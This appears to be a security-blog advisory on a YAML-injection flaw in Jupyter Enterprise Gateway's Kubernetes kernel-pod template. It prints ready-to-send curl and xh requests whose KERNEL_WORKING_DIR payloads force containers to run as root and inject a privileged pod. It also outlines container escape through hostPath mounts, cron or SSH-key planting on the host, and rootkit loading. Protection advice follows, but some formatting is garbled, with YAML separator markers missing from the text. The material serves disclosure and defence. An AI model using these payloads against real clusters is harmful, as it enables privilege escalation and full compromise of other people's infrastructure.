Listen to this Post
Intro
This vulnerability exists in Jupyter Enterprise Gateway because the server interpolates untrusted environment variables (e.g., KERNEL_XXX) into Kubernetes manifests without any YAML‑aware escaping. The Jinja2 template `kernel-pod.yaml.j2` contains several `kernel_xxx` placeholders such as kernel_working_dir; these are directly replaced with values provided via the API call. An attacker can control those environment variables (originally `KERNEL_XXX` before conversion to lowercase) and inject arbitrary YAML syntax. Because the rendering is performed line‑by‑line without validating or escaping YAML‑special characters like newlines, quotes, or document separators, a malicious variable can break out of its intended string context. For example, injecting a double quote followed by a newline allows the attacker to close the original string, add new YAML keys, and even overwrite existing ones. In YAML, when duplicate keys occur the last occurrence wins – this enables overwriting critical fields such as securityContext. Moreover, by injecting (document separator) and `...` (end‑of‑document) markers, an attacker can create multi‑document YAML streams, causing the Kubernetes client to parse and apply multiple resources from a single manifest. This results in the creation of arbitrary additional resources like privileged pods, secrets, persistent volume claims, services, or config maps. The proof‑of‑concept uses `KERNEL_WORKING_DIR` (when `EG_MIRROR_WORKING_DIRS` is enabled) but any of the `KERNEL_` variables is a vector. The attack is especially dangerous because it allows an unauthenticated (or low‑privileged) user to escalate to root on the host node and fully compromise the Kubernetes cluster.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Jupyter Enterprise Gateway
Version: <= 3.2.1 (estimated)
Vulnerability: YAML injection
Severity: Critical
date: 2024-12-15 (disclosure)
<h2 style="color: blue;">Prediction: 2025-01-30</h2>
<h2 style="color: blue;">What Undercode Say</h2>
Check if EG_MIRROR_WORKING_DIRS is enabled (default false) curl -s http://localhost:31529/api/kernels | jq '.' Exploit using xh (install: cargo install xh) xh http://localhost:31529/api/kernels env:[email protected] env-working-dir-exploit.yaml content: { "KERNEL_POD_NAME": "working-dir-root", "KERNEL_NAMESPACE": "notebooks", "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n INJECTION\\n securityContext:\\n runAsUser: 0\\n runAsGroup: 0\\n fsGroup: 100\\n HAHA - stray quote \"" } Equivalent curl command curl http://localhost:31529/api/kernels \ -H 'content-type: application/json' \ -d '{"env":{"KERNEL_POD_NAME":"working-dir-root","KERNEL_NAMESPACE":"notebooks","KERNEL_WORKING_DIR":"\"/tmp\\\"\\n\\n INJECTION\\n securityContext:\\n runAsUser: 0\\n runAsGroup: 0\\n fsGroup: 100\\n HAHA - stray quote \""}}' Multi-document injection to create a new privileged pod cat > env-working-dir-exploit-pod.yaml <<EOF { "KERNEL_POD_NAME": "working-dir-root-pod", "KERNEL_NAMESPACE": "notebooks", "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n INJECTION\\n...\\n\\napiVersion: v1\\nkind: Pod\\nmetadata:\\n name: injected-pod\\n spec:\\n containers:\\n - name: injected-container\\n image: nginx\\n ports:\\n - containerPort: 80\\n securityContext:\\n privileged: true\\n runAsUser: 0\\n runAsGroup: 0\\n...\\n HAHA - stray quote\"" } EOF xh http://localhost:31529/api/kernels env:[email protected] Verify injected resources kubectl get pods -n notebooks kubectl get pod/injected-pod -n notebooks -o jsonpath='{.spec.containers[].securityContext}'
<h2 style="color: blue;">Exploit</h2>
1. Overwrite securityContext – Inject a duplicate `securityContext` key under the pod spec. The injected block (`runAsUser: 0`, `runAsGroup: 0`, `fsGroup: 100`) replaces the original, making the container run as root (uid 0, gid 0).
2. Create arbitrary resources – Use to start a new YAML document and `…` to end the previous one. The renderer concatenates the injected YAML after the legitimate `workingDir` field, resulting in a multi‑document manifest. Kubernetes accepts each document as a separate resource, allowing an attacker to create privileged pods, persistent volumes, secrets, etc.
3. Container escape via hostPath – Combine an injected `securityContext` (root) with a `hostPath` volume mount pointing to the host’s root filesystem. Then write a cron job or SSH key on the host to gain persistent code execution on the worker node.
4. Privileged pod modules – Create a pod with `privileged: true` and load kernel modules (e.g., `insmod` a rootkit) or directly access `/dev/mem` to compromise the entire node.
Protection
- Upgrade to a patched version of Jupyter Enterprise Gateway (≥ 3.2.2) where environment variables are properly escaped or sanitized before YAML rendering.
- Disable `EG_MIRROR_WORKING_DIRS` (set to `false` or omit) to prevent `KERNEL_WORKING_DIR` from being interpolated.
- Enforce Kubernetes admission controllers (e.g., OPA/Gatekeeper, Pod Security Standards) to block pods with
runAsUser: 0,privileged: true, or suspicious `hostPath` mounts. - Restrict network access to the Enterprise Gateway API (port 31529 in the example) to trusted users only.
- Use a Web Application Firewall (WAF) or API gateway that validates JSON structure and rejects requests containing “,
..., or newline characters inside environment variable values.
Impact
- An attacker can create arbitrary Kubernetes resources (Pod, Secret, PersistentVolumeClaim, PersistentVolume, Service, ConfigMap) with full control over
image,securityContext,volumeMounts, andhostPath. - Privileged pods can be spawned, allowing container escape via kernel module loading or host filesystem access.
- A `hostPath` mount combined with root privileges enables writing crontabs or scripts on the worker node, leading to host compromise.
- Repeated exploitation compromises all worker nodes and the entire Kubernetes cluster, resulting in data theft, cryptojacking, or lateral movement to other clusters.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
